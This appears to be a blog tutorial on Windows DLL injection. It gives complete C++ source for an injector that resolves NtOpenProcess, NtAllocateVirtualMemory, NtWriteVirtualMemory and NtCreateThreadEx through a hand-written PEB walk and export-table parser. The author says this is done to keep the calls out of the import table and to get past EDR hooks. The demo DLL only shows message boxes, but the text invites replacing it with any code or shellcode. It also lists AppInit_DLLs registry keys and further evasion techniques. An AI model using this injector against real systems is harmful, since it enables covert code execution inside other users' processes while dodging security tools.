What is DLL Injection

DLL injection is a programming technique that allows code, contained within a Dynamic Link Library (DLL), to be loaded and executed inside the address space of another process. This means the injected DLL can run with the same permissions and context as the target application.

Why inject?

placing code into another process often referred as process injection can be used for both good and bad, the difference lies in why it's being done and who is doing it.

On the legitimate side, many antivirus programs, security tools, and monitoring tools rely on code injection techniques to keep your system safe. For example, a security product might inject a small piece of code into every running application so it can watch what each program is doing in real time. This allows it to intercept important actions — a practice known as hooking such as when a program tries to create a new process, access sensitive data, or read/write a file, so the security tool can inspect and monitor that activity.

The reason they inject into each process instead of just a single DLL like ntdll.dll is because malicious behavior doesn’t always go through one predictable path. If they only hooked NTDLL, attackers could bypass detection by:

Manually mapping an unhooked version of NTDLL.
Making raw syscalls directly without using NTDLL.
Using higher-level APIs in other DLLs (kernel32.dll, user32.dll, etc.) that internally trigger the same system calls.
Executing malicious logic entirely in user-mode before the syscall happens.

By injecting into each process, the security tool gains:

Full visibility into all API calls at multiple levels (user-mode and syscall level).
Context, such as the call stack, loaded modules, and memory contents when an action occurs.
Protection against hook removal, because hooks are spread across multiple DLLs in every process.
Detection of in-memory threats, like shellcode in RWX memory regions that never touch disk.

Take file access as an example. In normal use, a word processor like Microsoft Word mainly reads and writes document files. If security software detects that Word is suddenly trying to access system password files or make changes to the Windows registry, that’s unusual behavior. It could indicate that a malicious macro or exploit is running inside the program. In this situation, the injected monitoring code acts like a silent security guard, positioned inside the application to watch every move and stop anything suspicious before it causes harm.

Of course, the very same mechanism can be abused by attackers. Malicious actors can inject their own code into trusted programs to hide their activity, steal data, or execute harmful commands often without being detected. This dual nature is why DLL injection is considered both a powerful development tool and a potential security threat.

How it work?

On Windows, user-mode processes are isolated from one another each process has its own private memory space that other processes normally can’t access. This isolation is a core security feature, preventing programs from tampering with each other’s memory directly.

Every process executes code through threads, and a process needs at least one running thread to do anything.

When you want to inject code or a DLL into another process, the problem is twofold:

Placing the code into the target process’s memory
Getting the target process to execute that code

The simplest and most common method uses Windows API functions:

OpenProcess – Get a handle to the target process with the required permissions.
VirtualAllocEx – Allocate memory inside the target process’s address space for your code or data.
WriteProcessMemory – Write the code (or DLL path) into that allocated memory.
(Optional) ReadProcessMemory – Read from the target process’s memory if needed.
CreateRemoteThread – Start a new thread in the target process that begins execution at your injected code’s address.

This sequence is the classic approach to process injection. There are more advanced methods (like APC injection, thread hijacking, or reflective DLL loading), but this one is the most straightforward and widely used. in our example in github we will use undocumented functions to avoid detection.

Create payload

In this step, you can inject shellcode or a DLL, but in our example, we will create a DLL that will be loaded into the target process. First, to create a custom DLL, read the official Windows documentation.

In our example, the DLL code simply shows a message box with different messages depending on the callback.

When the DLL is loaded into a process (DLL_PROCESS_ATTACH), it shows a message box saying "Malicious DLL Attached and Executed!!!!!!" to indicate that the DLL is now active.
When the DLL is unloaded from the process (DLL_PROCESS_DETACH), it shows a message box saying "Malicious DLL Detached!" signaling that the DLL is being removed.
When a new thread starts in the process (DLL_THREAD_ATTACH), it shows a message box "Thread Created!" indicating a thread was created while the DLL is loaded.

custom_dll.cpp

#include "pch.h"
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        MessageBoxA(NULL, "Malicious DLL Attached and Executed", "WARNING", MB_ICONEXCLAMATION);
        break;
    case DLL_PROCESS_DETACH:
        MessageBoxA(NULL, "Malicious DLL Detached!", "WARNING", MB_ICONEXCLAMATION);
        break;
    case DLL_THREAD_ATTACH:
        MessageBoxA(NULL, "Thread Created!", "WARNING", MB_ICONEXCLAMATION);
        break;
    case DLL_THREAD_DETACH:
        MessageBoxA(NULL, "Thread Terminated", "WARNING", MB_ICONEXCLAMATION);
        break;
    }
    return TRUE;
}

Code

in our example in GitHub, we used undocumented function. first we need to create function that dynamically load GetModuleHandle. this will allow us to use this function without showing in the Import Address Table (IAT). also some EDR hooks kernel32.dll Dynamic loading allows you to get the function pointer from ntdll.dll directly, or even resolve syscalls, bypassing those hooks. the function does the following:

The code gets the PEB (Process Environment Block) from the segment register (GS on x64, FS on x86). The PEB contains info about all loaded modules.
It goes through the linked list of loaded modules in peb->Ldr->InMemoryOrderModuleList.
For each module, it converts the wide-char DLL name to ANSI, makes it lowercase, and checks if it contains the given moduleName. If found, it returns the module’s base address.

If no match is found, it returns NULL.

ManualGetModuleHandle.cpp

// This function manually replicates the behavior of the standard `GetModuleHandle` API call.
// It finds the base address of a loaded DLL (module) in the current process by its name.
// It does this by directly accessing the Process Environment Block (PEB).
HMODULE ManualGetModuleHandle(LPCSTR moduleName) {
	// The PEB (Process Environment Block) is a data structure that holds information about a process.
	// Its location in memory is fixed relative to a segment register.
#ifdef _WIN64
	// On 64-bit Windows, a pointer to the PEB is stored at offset 0x60 from the GS segment register.
	// `__readgsqword` is a compiler intrinsic that reads a 64-bit value directly from this location.
	PPEB peb = (PPEB)__readgsqword(0x60);
#else
	// On 32-bit Windows, the pointer is at offset 0x30 from the FS segment register.
	PPEB peb = (PPEB)__readfsdword(0x30);
#endif

	// Basic sanity check. If we can't get the PEB or its Ldr member, we can't proceed.
	if (!peb || !peb->Ldr) return NULL;

	// The PEB's Ldr member points to a PEB_LDR_DATA structure, which contains information about loaded modules.
	// `InMemoryOrderModuleList` is a doubly-linked list of all modules loaded by the process.
	// A linked list is a data structure where each element (node) points to the next one.

	// `head` points to the sentinel node of the list. This node itself doesn't represent a module.
	LIST_ENTRY* head = &peb->Ldr->InMemoryOrderModuleList;
	// `current` is initialized to point to the first actual module in the list.
	LIST_ENTRY* current = head->Flink;

	// We iterate through the linked list. The list is circular, meaning the last element's `Flink`
	// (forward link) points back to the head. When `current` equals `head`, we've looped through the entire list.
	while (current != head) {
		// `CONTAINING_RECORD` is a clever macro. `current` is a pointer to the `InMemoryOrderLinks` field
		// inside a `LDR_DATA_TABLE_ENTRY` struct. This macro calculates the starting address of the
		// parent `LDR_DATA_TABLE_ENTRY` struct from the address of its member field.
		PLDR_DATA_TABLE_ENTRY entry = CONTAINING_RECORD(current, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);

		// Check if the DLL name is valid before trying to read it.
		if (entry->FullDllName.Buffer) {
			// Create a buffer to hold the module name as a standard C-style string (char array).
			char name[MAX_PATH] = { 0 }; // Initialize with zeros.

			// The `FullDllName.Buffer` stores the name as a wide-character string (UTF-16).
			// We need to convert it to a multi-byte (ANSI) string to compare it with `moduleName`.
			WideCharToMultiByte(
				CP_ACP,                             // Code Page: Use the system's default ANSI code page.
				0,                                  // Flags: 0 for default behavior.
				entry->FullDllName.Buffer,          // Input: The wide-character string to convert.
				entry->FullDllName.Length / sizeof(WCHAR), // Input: The length of the string in characters.
				name,                               // Output: The buffer to store the converted ANSI string.
				sizeof(name) - 1,                   // Output: The size of the output buffer.
				NULL,                               // Default Char: Use system default if a character can't be converted.
				NULL                                // Used Default Char: We don't need to know if a default was used.
			);

			// To make the comparison case-insensitive (e.g., "ntdll.dll" matches "NTDLL.DLL"),
			// we convert the extracted name to lowercase. `_strlwr_s` is a safe version of `_strlwr`.
			_strlwr_s(name, sizeof(name));

			// `strstr` checks if the `moduleName` we're looking for is a substring of the module's full path.
			// This is a simple way to match "ntdll.dll" against "C:\Windows\System32\ntdll.dll".
			if (strstr(name, moduleName)) {
				// If we find a match, we return the base address of the DLL (`DllBase`).
				// This is the `HMODULE` we were looking for.
				return (HMODULE)entry->DllBase;
			}
		}
		// Move to the next module in the linked list.
		current = current->Flink;
	}

	// If the loop finishes without finding the module, we return NULL.
	return NULL;
}

after getting the GetModuleHandle, which allow us to get handler for a module, we need a function that take a module handler, and function name. and parse the PE header of the module and search for the function we want and return the address of the function.

Check PE headers → Make sure the DLL at hModule is valid (MZ DOS header + PE NT header)

.Find Export Directory → Use the PE header’s data directory to locate where the list of exported functions is stored

.Read Export Tables:

AddressOfNames → All function names.
AddressOfFunctions → RVAs (Relative Virtual Addresses) of the function code.
AddressOfNameOrdinals → Links names to function addresses.

Search for the target function name.Return its absolute address (base address + RVA).

ManualGetProcAddress.cpp

// This function manually replicates the behavior of the standard `GetProcAddress` API call.
// It finds the memory address of an exported function within a loaded module (DLL).
// It works by parsing the PE (Portable Executable) file format of the DLL directly in memory.
FARPROC ManualGetProcAddress(HMODULE hModule, LPCSTR functionName) {
	// The `hModule` is the base address of the DLL in memory. We cast it to a pointer to an
	// `IMAGE_DOS_HEADER`. This header is at the very beginning of every PE file.
	IMAGE_DOS_HEADER* dosHeader = (IMAGE_DOS_HEADER*)hModule;
	// The `e_magic` field should be "MZ" (0x5A4D), which is the signature for a DOS header.
	// This is a sanity check to ensure we're looking at a valid PE file.
	if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
		return NULL;
	}

	// The DOS header contains an offset, `e_lfanew`, which points to the NT headers.
	// We calculate the address of the NT headers by adding this offset to the module's base address.
	IMAGE_NT_HEADERS* ntHeaders = (IMAGE_NT_HEADERS*)((BYTE*)hModule + dosHeader->e_lfanew);
	// The NT headers also have a signature, which should be "PE\0\0" (0x00004550).
	if (ntHeaders->Signature != IMAGE_NT_SIGNATURE) {
		return NULL;
	}

	// The NT headers contain an `OptionalHeader`, which in turn has a `DataDirectory`.
	// The `DataDirectory` is an array of entries pointing to important parts of the PE file.
	// We want the entry for the export directory (`IMAGE_DIRECTORY_ENTRY_EXPORT`).
	IMAGE_DATA_DIRECTORY* exportDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
	// If the virtual address or size is zero, it means this module doesn't export any functions.
	if (exportDir->VirtualAddress == 0 || exportDir->Size == 0) {
		return NULL;
	}

	// The `VirtualAddress` is an RVA (Relative Virtual Address), an offset from the module's base address.
	// We calculate the actual memory address of the export directory.
	IMAGE_EXPORT_DIRECTORY* exports = (IMAGE_EXPORT_DIRECTORY*)((BYTE*)hModule + exportDir->VirtualAddress);

	// Now we get the addresses of the three important tables in the export directory:
	// 1. AddressOfFunctions: An array of RVAs to the exported functions' code.
	// 2. AddressOfNames: An array of RVAs to the names of the exported functions.
	// 3. AddressOfNameOrdinals: An array of indices that links the names table to the functions table.
	DWORD* functions = (DWORD*)((BYTE*)hModule + exports->AddressOfFunctions);
	DWORD* names = (DWORD*)((BYTE*)hModule + exports->AddressOfNames);
	WORD* ordinals = (WORD*)((BYTE*)hModule + exports->AddressOfNameOrdinals);

	// We loop through all the exported function names.
	for (DWORD i = 0; i < exports->NumberOfNames; i++) {
		// Get the RVA of the current function name and calculate its actual address in memory.
		char* name = (char*)((BYTE*)hModule + names[i]);
		// Compare the current function name with the one we're looking for.
		if (strcmp(name, functionName) == 0) {
			// If we find a match, we've found our function.
			// `ordinals[i]` gives us the index into the `functions` array for this named function.
			// `functions[ordinals[i]]` gives us the RVA of the function's code.
			// We add this RVA to the module's base address to get the final, absolute memory address.
			return (FARPROC)((BYTE*)hModule + functions[ordinals[i]]);
		}
	}

	// If the loop finishes without finding the function, we return NULL.
	return NULL; // Function not found
}

after all that, in the main function we need the target PID, and the path of the DLL that we be injected in the target process. the main function does the following:

Check input arguments
The program expects exactly 2 arguments:

Target process ID (PID)
Full path to the DLL file to inject
If arguments are missing or incorrect, it prints usage instructions and exits.

Parse inputs

Convert the PID argument from string to DWORD.
Store the DLL path string.

Open target process handle

Use a manual ManualGetProcAddress + ManualGetModuleHandle to get the address of NtOpenProcess from ntdll.dll.
Prepare required structures (CLIENT_ID, OBJECT_ATTRIBUTES) with the PID.
Call NtOpenProcess with permissions to create threads and manipulate process memory.
If it fails, print error and exit; otherwise keep the process handle.

Allocate memory in target process

Get address of NtAllocateVirtualMemory from ntdll.dll using the manual method.
Allocate memory in the remote process sized to hold the DLL path string.
If allocation fails, print error and exit.

Write DLL path to allocated memory

Get address of NtWriteVirtualMemory.
Write the DLL path string into the remote process’s allocated memory.
If writing fails, print error and exit.

Get address of LoadLibraryA

Use manual method to find LoadLibraryA in kernel32.dll.
LoadLibraryA will be called remotely to load the DLL into the target process.

Create remote thread

Get address of NtCreateThreadEx in ntdll.dll.
Create a remote thread in the target process that starts by running LoadLibraryA, passing the address of the DLL path in the target process memory.
This causes the target process to load the DLL.
If thread creation fails, print error and exit.

Cleanup and finish

Close handles for the created thread and process.
Print success messages and exit

main.cpp

// The main entry point of the program.
int main(int argc, char* argv[]) {

	if (argc != 3) {
		cerr << "Usage:\n";
		cerr << "\tDLL_injector.exe <PID> <PathToDLL>\n";
		cerr << "Example:\n";
		cerr << "\tDLL_injector.exe 19692 \"C:\\Users\\mohe_2004\\Desktop\\some code\\custom_dll\\x64\\Release\\custom_dll.dll\"\n";

		return 1;
	}


	// The Process ID (PID) of the target process we want to inject our DLL into.
	// NOTE: You must change this to the PID of a running process on your system for this to work.
	// You can find PIDs using Task Manager.
	DWORD pid = static_cast<DWORD>(strtoul(argv[1], nullptr, 10));
	// The full, absolute path to the DLL file that we want to inject.
	const char* dllPath = argv[2];

	// --- Step 1: Get a handle to the target process ---
	cout << "[+] Opening target process with PID: " << pid << "\n";

	// Instead of calling `GetProcAddress`, we use our manual implementation to find `NtOpenProcess`.
	// We first get a handle to `ntdll.dll` and then find the function's address within it.
	pNtOpenProcess NtOpenProcess = (pNtOpenProcess)ManualGetProcAddress(
		ManualGetModuleHandle("ntdll.dll"), // Find ntdll.dll's base address
		"NtOpenProcess"                     // Find the function's address inside it
	);

	HANDLE hprocess = NULL; // This will store the handle to the target process.
	CLIENT_ID cid = { 0 };  // A structure required by NtOpenProcess to identify the target.
	cid.UniqueProcess = (HANDLE)pid; // We specify the target by its Process ID.
	cid.UniqueThread = NULL;         // Not used when opening a process.

	OBJECT_ATTRIBUTES objAttr; // Another structure required by many Native API functions.
	// `InitializeObjectAttributes` is a macro that zeroes out the structure for us.
	// We don't need any special attributes, so we pass NULLs.
	InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL);

	// Call the `NtOpenProcess` function we found earlier.
	NTSTATUS status = NtOpenProcess(
		&hprocess,							// Output: The handle will be stored here.
		PROCESS_CREATE_THREAD |				// Permissions: We need permission to create a thread.
		PROCESS_QUERY_INFORMATION |			// To query process info (often needed).
		PROCESS_VM_OPERATION |				// To perform memory operations like allocation.
		PROCESS_VM_WRITE |					// To write into the process's memory.
		PROCESS_VM_READ,					// To read from the process's memory.
		&objAttr,							// Input: The initialized object attributes.
		&cid								// Input: The client ID specifying the target PID.
	);

	// `NTSTATUS` is a type used by Native API functions. A value of 0 means success.
	// Any other value indicates an error.
	if (status != 0) {
		cerr << "[-] NtOpenProcess failed with status: 0x" << std::hex << status << std::endl;
		return 1; // Exit the program with an error code.
	}
	cout << "[+] Opened process handle: " << hprocess << "\n";

	// --- Step 2: Allocate memory in the target process for the DLL path ---

	// Get the address of `NtAllocateVirtualMemory` from `ntdll.dll`.
	pNtAllocateVirtualMemory NtAllocateVirtualMemory = (pNtAllocateVirtualMemory)ManualGetProcAddress(
		ManualGetModuleHandle("ntdll.dll"),
		"NtAllocateVirtualMemory"
	);
	if (!NtAllocateVirtualMemory) {
		cerr << "[-] Failed to resolve NtAllocateVirtualMemory\n";
		return 1;
	}

	cout << "[+] Allocating memory in remote process...\n";

	PVOID baseAddress = nullptr; // This will store the address of the memory we allocate.
	// The size of memory we need is the length of the DLL path string, plus one byte for the null terminator.
	SIZE_T size = strlen(dllPath) + 1;

	// Call the allocation function.
	NTSTATUS statusAllocation = NtAllocateVirtualMemory(
		hprocess,                // Handle to the target process.
		&baseAddress,            // Output: Receives the address of the allocated memory.
		0,                       // ZeroBits: Must be 0.
		&size,                   // Input/Output: The size of memory to allocate.
		MEM_COMMIT | MEM_RESERVE, // Allocation Type: Reserve and commit the memory in one step.
		PAGE_READWRITE           // Protection: We need to be able to read and write to this memory.
	);

	if (statusAllocation != 0) {
		cerr << "[-] NtAllocateVirtualMemory failed with NTSTATUS: 0x" << hex << statusAllocation << endl;
		return 1;
	}
	cout << "[+] Memory allocated at address: " << baseAddress << endl;

	// --- Step 3: Write the DLL path into the allocated memory ---
	cout << "[+] Writing DLL path into allocated memory...\n";

	// Get the address of `NtWriteVirtualMemory` from `ntdll.dll`.
	pNtWriteVirtualMemory _NtWriteVirtualMemory = (pNtWriteVirtualMemory)ManualGetProcAddress(
		ManualGetModuleHandle("ntdll.dll"),
		"NtWriteVirtualMemory"
	);
	if (!_NtWriteVirtualMemory) {
		cerr << "[-] Failed to resolve NtWriteVirtualMemory\n";
		return 1;
	}

	SIZE_T bytesWritten = 0; // This will store the number of bytes that were actually written.
	// Call the write function.
	NTSTATUS statusWrite = _NtWriteVirtualMemory(
		hprocess,              // Handle to the target process.
		baseAddress,           // The address in the target process where we want to write.
		(PVOID)dllPath,        // A pointer to our local buffer containing the DLL path.
		(ULONG)(strlen(dllPath) + 1), // The number of bytes to write.
		&bytesWritten          // Output: Receives the number of bytes written.
	);

	if (statusWrite != 0) {
		cerr << "[-] Failed to write to memory at address: " << baseAddress
			<< ". Error code: " << GetLastError() << "\n";
		return 1;
	}
	cout << "[+] Wrote DLL path to remote process memory. Wrote: " << bytesWritten << "\n";

	// --- Step 4: Get the address of the `LoadLibraryA` function ---
	// `LoadLibraryA` is the function that can load a DLL into a process. It's located in `kernel32.dll`.
	// The plan is to create a remote thread that starts by executing `LoadLibraryA`, and we will give it
	// the address of our DLL path (which we just wrote into the target's memory) as its argument.
	FARPROC LoadLibraryAddress = ManualGetProcAddress(
		ManualGetModuleHandle("kernel32.dll"), // Find kernel32.dll
		"LoadLibraryA"                         // Find the address of LoadLibraryA
	);
	if (!LoadLibraryAddress) {
		cerr << "[-] Failed to get address of LoadLibraryA. Error code: " << GetLastError() << "\n";
		return 1;
	}
	cout << "[+] Got LoadLibraryA address: " << LoadLibraryAddress << "\n";

	// --- Step 5: Create a remote thread to execute `LoadLibraryA` ---
	cout << "[+] Creating remote thread in target process...\n";

	// Get the address of `NtCreateThreadEx` from `ntdll.dll`.
	pNtCreateThreadEx _NtCreateThreadEx = (pNtCreateThreadEx)ManualGetProcAddress(
		ManualGetModuleHandle("ntdll.dll"),
		"NtCreateThreadEx"
	);
	if (!_NtCreateThreadEx) {
		cerr << "[-] Failed to resolve NtCreateThreadEx\n";
		return 1;
	}

	HANDLE thread = nullptr; // This will receive the handle of the newly created thread.

	// Call the thread creation function.
	NTSTATUS statusThreadCreation = _NtCreateThreadEx(
		&thread,                             // Output: Receives the new thread handle.
		0x1FFFFF,                            // Access Mask: A common value for "all access".
		NULL,                                // Object Attributes: Use defaults.
		hprocess,                            // Target Process Handle: The process to create the thread in.
		LoadLibraryAddress,                  // Start Routine: The function the new thread will execute.
		baseAddress,                         // Argument: The argument passed to the start routine (our DLL path).
		FALSE,                               // Create Flags: 0 or FALSE means the thread runs immediately.
		0,                                   // ZeroBits: Not used.
		0,                                   // StackSize: 0 for default size.
		0,                                   // MaximumStackSize: 0 for default size.
		NULL                                 // AttributeList: Not used.
	);

	// Check if the thread was created successfully.
	if (statusThreadCreation != 0 || !thread) {
		cerr << "[-] Failed to create remote thread. NTSTATUS: 0x" << hex << statusThreadCreation << std::endl;
		return 1;
	}

	cout << "[+] Successfully created remote thread: " << thread << "\n";
	cout << "[+] DLL injection should be complete!" << endl;

	// The program successfully completed its task.
	CloseHandle(thread);
	CloseHandle(hprocess);

	return 0;
}

Demo

let's test the code and targeting notepad.exe

if everything is fine, first callback should be triggered in the dll which is DLL_PROCESS_ATTACH, and it simply will show message like the following

and let's try to trigger the DLL_THREAD_ATTACH, this callback will run when process spawn a new thread, so let's open a new tab in notepad that should trigger this event

You got the idea — every action we make, the DLL will show a message. You can change the DLL code to make it run any code you want, or you can run shellcode instead of the DLL.

Other way

There are many ways to perform DLL injection. For example, instead of using LoadLibrary, we can manually map the DLL into the target process’s memory this method is called reflective DLL injection. Another method is using LoadLibrary combined with QueueUserAPC, which injects a DLL without creating new threads in the target process.

Windows also provides some built-in methods for DLL injection that are used for various legitimate purposes. One simple way is through specific registry keys:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs

On 64-bit systems, there are separate registry keys for 32-bit applications:

HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs

By adding a DLL filename to the AppInit_DLLs value, that DLL will automatically be loaded into every process that loads User32.dll — which includes most Windows applications. This only works if the LoadAppInit_DLLs value is set to 0x00000001.

Final thought

DLL injection can be achieved through various techniques depending on the use case and level of stealth required. While common methods like using LoadLibrary or reflective DLL injection are widely used, there are also advanced approaches such as unhooking direct syscalls, indirect syscalls, API hashing, and others that offer greater evasion from detection and hooking by security software.